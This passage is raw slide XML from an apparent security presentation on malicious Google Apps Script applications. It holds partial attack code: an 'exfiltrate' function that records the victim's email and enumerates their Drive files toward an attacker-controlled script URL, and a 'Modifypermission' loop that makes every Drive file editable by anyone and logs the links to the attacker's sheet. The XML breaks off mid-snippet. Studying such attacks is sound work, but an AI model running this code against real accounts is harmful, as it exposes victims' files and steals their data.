            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> MAX_CHUNK = 49999;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> RECOVER_APP = "https://script.google.com/macros/s/XXXX";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> BYTES_LIMIT = 70 * 1024 * 1024;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>var BYTES = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>sheetName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>victimData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>spreadsheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>SpreadsheetApp.getActiveSpreadsheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>SpreadsheetApp.getActiveSpreadsheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>getId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>spreadsheet.getSheetByName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>sheetName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>spreadsheet.deleteSheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>spreadsheet.getSheetByName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>sheetName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>SpreadsheetApp.flush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>spreadsheet.insertSheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>sheetName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>currentUserMail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>Session.getActiveUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>getEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>sheet.getRange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(1, 1).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>setValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>currentUserMail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var files = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>DriveApp.getFiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> = 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>files.hasNext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>()) {</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Image 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6694CB3-B8B7-A968-4383-BC294FEAA9A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043879" y="2545552"/>
            <a:ext cx="3801662" cy="2337208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEA462C-27CD-F1AA-8D8D-A738004F1EF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>29/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="768125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Scenario #3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Sous-titre 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC270F5D-E53C-182B-1F0B-8E9773948A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311710" y="1272521"/>
            <a:ext cx="8390329" cy="1174261"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>The victim accesses a malicious GAS application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>The permissions of all the victim's Google Drive files are changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>The links of each documents are sent to a Google Sheets belonging to the attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{409AAED1-47EF-7C6D-3170-FE77BB7D9B71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="740999" y="2556900"/>
            <a:ext cx="2380820" cy="2055989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Comment utiliser des macros dans Google Sheet ? - DSI et chef de projet IT  externalisé sur Nantes.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{989D9ACB-8E9C-EA6C-3243-840F907115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3762" y="3483327"/>
            <a:ext cx="1143001" cy="10287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avec flèche 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0701734F-D929-9C0C-E0C0-D2BFD9BCA536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3743325" y="4167890"/>
            <a:ext cx="3007519"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58A23A2B-349E-2E88-E80D-6D9146E95995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3614737" y="3859177"/>
            <a:ext cx="3837717" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> share links to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Google Sheets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CCB7E9E-C4C4-6264-1D58-56356BF05225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-112542" y="4612889"/>
            <a:ext cx="4087902" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> permission on all Google Drive </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>files of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{281B0C18-C839-843E-0707-B54C272EDC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311711" y="2364581"/>
            <a:ext cx="8696558" cy="2678095"/>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avec flèche 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC0BCA76-2CC9-1A93-5EC1-0B4412C115C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7755692" y="3013023"/>
            <a:ext cx="0" cy="69060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E939EDFC-EC73-8990-33A2-8FF86138A7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6737970" y="2589941"/>
            <a:ext cx="2035443" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>anyone</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35569663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Scenario #3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle : coins arrondis 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F069C08B-097D-BEC9-BE5D-BB22FD671DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5829300" y="959412"/>
            <a:ext cx="3210401" cy="3923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1400" b="1" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>snippet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>Modifypermission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var file;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var data;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  var files = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>DriveApp.getFiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>files.hasNext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>()) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    var file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>files.next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>file.setSharing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>DriveApp.Access.ANYONE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>DriveApp.Permission.EDIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>SpreadsheetApp.getActiveSheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>    data = [ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>file.getName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>file.getDateCreated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
